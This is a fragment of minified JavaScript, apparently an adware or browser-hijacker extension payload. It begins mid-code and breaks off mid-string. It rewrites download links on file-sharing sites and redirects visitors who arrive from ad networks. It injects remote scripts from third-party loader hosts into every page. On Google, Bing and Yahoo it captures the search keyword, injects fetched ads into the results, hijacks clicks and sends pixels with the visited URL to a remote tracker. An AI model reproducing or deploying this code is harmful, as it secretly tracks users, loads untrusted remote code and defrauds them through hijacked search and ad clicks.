h=document.links[e],k=h.getAttribute(\"href\");if(k&&\n-1<k.indexOf(\"pubted.com/www/delivery/\")){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}}};this[\"vitorrent.net\"]=new function(){this.init=function(){for(var e=0;e<document.links.length;e++){var h=document.links[e],k=h.getAttribute(\"href\");if(k&&-1<k.indexOf(\"/file.php\")){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}}};this[\"uploaded.net\"]=new function(){this.init=function(){var e=n.utils.query_selector_all(\".free\")[0];\nif(\"undefined\"!==typeof e){var h=n.utils.duplicateElement(e);h.style.border=\"none\";var k=e.parentNode;k.insertBefore(h,e);k.removeChild(e)}e=n.utils.query_selector_all(\"#download .center\")[0];\"undefined\"!==typeof e&&n.utils.coverElement(e,void 0,\"130px\",void 0,void 0,void 0,void 0,!1)}};this[\"newsinitiative.org\"]=new function(){var e=this;e.init=function(){e.counter=0;e.interval=setInterval(function(){var h=n.utils.query_selector_all(\"noscript\")[1].parentNode;if(\"undefined\"!==typeof h){if(30>e.counter++){var k=\nh.children[0];if(\"undefined\"!==typeof k&&-1<k.getAttribute(\"src\").indexOf(\"data:image/\"))return}clearInterval(e.interval);var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}},500);var h=n.utils.query_selector_all(\".download-link a\");if(\"undefined\"!==typeof h)for(var k=0;k<h.length;k++){var l=n.utils.duplicateElement(h[k]),m=h[k].parentNode;m.insertBefore(l,h[k]);m.removeChild(h[k])}h=n.utils.query_selector_all(\".ads3 a\")[0];\"undefined\"!==typeof h&&(k=n.utils.duplicateElement(h),\nm=h.parentNode,m.insertBefore(k,h),m.removeChild(h))}};this[\"megafilmesonlinehd.com\"]=new function(){this.init=function(){var e=n.utils.query_selector_all(\"#ClickHere\")[0];if(\"undefined\"!==typeof e){var h=n.utils.duplicateElement(e),k=e.parentNode;k.insertBefore(h,e);k.removeChild(e)}}};this[\"mycoolmp3.com\"]=new function(){var e=this;e.init=function(){e.interval=setInterval(function(){if(\"undefined\"!==typeof n.utils.query_selector_all(\".downButtons\")[0]){var e=n.utils.query_selector_all(\".downButtons a\");\nif(!(2>e.length)&&(e=e[1],\"undefined\"!==typeof e)){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}},500)}};this[\"descargadictos.net\"]=new function(){var e=this;e.init=function(){e.counter=0;e.interval=setInterval(function(){var h=n.utils.query_selector_all(\".content\")[0].children[1];if(\"undefined\"!==typeof h){if(30>e.counter++){var k=h.firstChild;if(\"undefined\"!==typeof k&&-1<k.getAttribute(\"src\").indexOf(\"data:image/\"))return}clearInterval(e.interval);var k=\nn.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}},500);var h=n.utils.query_selector_all('[rel=\"nofollow\"]')[0];if(\"undefined\"!==typeof h){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}};this[\"toggle.com\"]=new function(){this.init=function(){var e=n.utils.query_selector_all(\".downloadLink.newDownloadLink a\")[0];if(\"undefined\"!==typeof e){var h=n.utils.duplicateElement(e),k=e.parentNode;k.insertBefore(h,e);k.removeChild(e)}}};\nthis[\"downloadshareware.com\"]=new function(){this.init=function(){var e=n.utils.query_selector_all(\"a#ads\")[0];if(\"undefined\"!==typeof e){var h=n.utils.duplicateElement(e),k=e.parentNode;k.insertBefore(h,e);k.removeChild(e)}}};this[\"primewire.ag\"]=new function(){this.init=function(){var e=n.utils.query_selector_all(\".quality_hd\");if(\"undefined\"!==typeof e)for(var h=0;h<e.length;h++){var k=e[h].parentNode.parentNode.children[1].children[0].children[0],l=n.utils.duplicateElement(k),m=k.parentNode;l.className=\n\"\";m.insertBefore(l,k);m.removeChild(k)}e=n.utils.query_selector_all(\".download_now_mouseover.no_c_link\")[0];\"undefined\"!==typeof e&&(l=n.utils.duplicateElement(e),m=e.parentNode,l.className=l.className.replace(\"no_c_link\",\"\"),m.insertBefore(l,e),m.removeChild(e));e=n.utils.query_selector_all(\".download_link .no_c_link\")[0];\"undefined\"!==typeof e&&(l=n.utils.duplicateElement(e),m=e.parentNode,l.className=l.className.replace(\"no_c_link\",\"\"),m.insertBefore(l,e),m.removeChild(e))}};this[\"ads.showmeflix.com\"]=\nnew function(){this.init=function(){var e=n.utils.query_selector_all(\".big-play\")[0];if(\"undefined\"!==typeof e){var h=n.utils.duplicateElement(e),k=e.parentNode;k.insertBefore(h,e);k.removeChild(e)}e=n.utils.query_selector_all(\".play-button\")[0];\"undefined\"!==typeof e&&(h=n.utils.duplicateElement(e),k=e.parentNode,k.insertBefore(h,e),k.removeChild(e));e=n.utils.query_selector_all(\".download.step\")[0];\"undefined\"!==typeof e&&(h=n.utils.duplicateElement(e),k=e.parentNode,k.insertBefore(h,e),k.removeChild(e))}};\nthis[\"myappsforpc.com\"]=new function(){this.init=function(){var e=n.utils.query_selector_all(\".download-link\");if(\"undefined\"!==typeof e)for(var h=0;h<e.length;h++){var k=n.utils.duplicateElement(e[h]),l=e[h].parentNode;l.insertBefore(k,e[h]);l.removeChild(e[h])}}};this.injectHidden=function(){var e=document.createElement(\"input\");e.type=\"hidden\";e.setAttribute(\"id\",\"sadkf345hks78923dkcvsdf\");document.getElementsByTagName(\"body\")[0].appendChild(e)};if(!document.getElementById(\"sadkf345hks78923dkcvsdf\"))if(\"undefined\"!==\ntypeof this[location.host]&&this.activeZds[location.host]&&window.self==window.top&&1==this.activeZds[location.host])this[location.host].init(),this.injectHidden();else for(var v in this.activeZds)if(-1<location.host.indexOf(v)&&1==this.activeZds[v])try{this[v].init(),this.injectHidden()}catch(y){}};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.or...\" Math.random();break}}}catch(d){}})();;new function(){if(!(document.getElementById(\"sdjksjsksjdskjd__0\")||window.self!=window.top||-1<location.host.indexOf(\"google.com\")||-1<location.host.indexOf(\"bing.com\")||-1<location.host.indexOf(\"yahoo.com\"))){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.setAttribute(\"id\",\"sdjksjsksjdskjd__0\");a.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=13872950&ext=tperfectcoupon&systemid=14365491252932439287&ext=tperfectcoupon\";document.getElementsByTagName(\"head\")[0].appendChild(a)}};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=684_1&hid=14365491252932439287&bname=tperfectcoupon\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=684_1&hid=14365491252932439287&bname=tperfectcoupon\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=13872950&ext=tperfectcoupon&systemid=14365491252932439287&ext=tperfectcoupon\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;window.top==window.self&&new function(){if(!document.getElementsByTagName(\"body\").length||!document.getElementsByTagName(\"body\")[0].getAttribute(\"s14365491252932439287\")){var m=document.getElementsByTagName(\"body\")[0];m&&m.setAttribute(\"s14365491252932439287\",\"1\");var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5.p\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"tperfectcoupon\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var f=a[e];b=new Image;b.src=f}else b=new Image,b.src=a};a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+ c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c, b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a); Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f= this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"== navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href: \"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=14365491252932439287&eid=684&pid=1&prodid=316&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+ b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()}, !1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}}; var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]= d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert|| \"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&& (a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}}; b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector, e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)\"string\"===typeof a&&(a[b]=a[b].replace(/\\\"/g,'\\\\\"'));return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a); d=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(var e=0;e<d.length;e++)a=a.replace(RegExp(\"\\\\[##\"+d[e].replace+\"##\\\\]\",\"g\"),d[e][\"with\"]);try{return\"undefined\"!==typeof c.pxl&&\"\"!==c.pxl&&b.utils.sendPixels(c.pxl),JSON.parse(a)}catch(f){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d, c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k[b]))return k[b];return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&& __yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var n=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at; break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c&&c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(var e=0;e<b.num_of_items_in_one&&0!=c.length;e++){var f=b.get_item_json(a,c[0]);try{b.insert_point.children.push(f)}catch(g){b.insert_point=d,b.insert_point.children.push(f)}\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()}};b.addEventsToItems= function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(n);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"== typeof d[e]){var k=this;n=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse©;return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node= b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a; if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if©for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b=a(this)}catch©{}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c= __yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name= a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&& \"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)}; b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=14365491252932439287&eid=684&pid=1&prid=316\"; \"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){\"\"!=a&&(window.__yael_res=JSON.parse(a),window.__yael_res.config.targets.header.num_of_items_in_one&& (b.num_of_items_in_one=window.__yael_res.config.targets.header.num_of_items_in_one),\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search()))})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}}; ;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=13872950&ext=tperfectcoupon&systemid=14365491252932439287&ext=tperfectcoupon\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_ad5cbe0b719874f1\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpgb.js?bname=tperfectcoupon&subid=684_1\";a.setAttribute(\"id\",\"id_ad5cbe0b719874f1\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;try{(function(){if(!document.getElementById(\"qwejkhjkshdf\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.text?a.text='window._rvz1017x1008 = {publisher_subid: \"684_1\",addonname: \"tperfectcoupon\"};':a.textContent?a.textContent='window._rvz1017x1008 = {publisher_subid: \"684_1\",addonname: \"tperfectcoupon\"};':a.innerHTML='window._rvz1017x1008 = {publisher_subid: \"684_1\",addonname: 